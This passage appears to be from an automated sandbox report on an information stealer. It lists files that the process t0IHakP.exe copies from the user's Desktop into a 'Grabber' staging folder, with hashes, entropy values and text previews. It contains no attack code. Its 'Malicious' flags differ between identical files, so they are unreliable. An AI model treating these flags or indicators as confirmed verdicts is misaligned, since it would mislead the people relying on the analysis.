Malicious:	true
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\JDSOXXXWOA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\MQAWXUYAIK.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694269844633945
Encrypted:	false
SSDEEP:	24:8fZFmL9j6Vqvtvrd45sdmW5rRO2KEceUJEcnD1:8RFmL9wqY5qmW5VvcpJEq
MD5:	5E40B4BAF83E9A23A02D6AB379018ADE
SHA1:	47E1914E79AF5D1C90B201FA9A2470A6DDE0D2D0
SHA-256:	E4A221B66518E711FA910625864F36100572A341B05960B3A01889E6393860AF
SHA-512:	50B4FC17B8E6A3D6F2AE7E79BC928ECF02344807B7C0103D91C9C9B01846D3026F377511B8792658587CED392F303F3B325DACD669554055A3C4E778E64A5CA9
Malicious:	false
Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\TTCBKWZYOC.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\XQACHMZIHU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MQAWXUYAIK.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694269844633945
Encrypted:	false
SSDEEP:	24:8fZFmL9j6Vqvtvrd45sdmW5rRO2KEceUJEcnD1:8RFmL9wqY5qmW5VvcpJEq
MD5:	5E40B4BAF83E9A23A02D6AB379018ADE
SHA1:	47E1914E79AF5D1C90B201FA9A2470A6DDE0D2D0
SHA-256:	E4A221B66518E711FA910625864F36100572A341B05960B3A01889E6393860AF
SHA-512:	50B4FC17B8E6A3D6F2AE7E79BC928ECF02344807B7C0103D91C9C9B01846D3026F377511B8792658587CED392F303F3B325DACD669554055A3C4E778E64A5CA9
Malicious:	false
Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NHPKIZUUSG.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TTCBKWZYOC.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	true
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
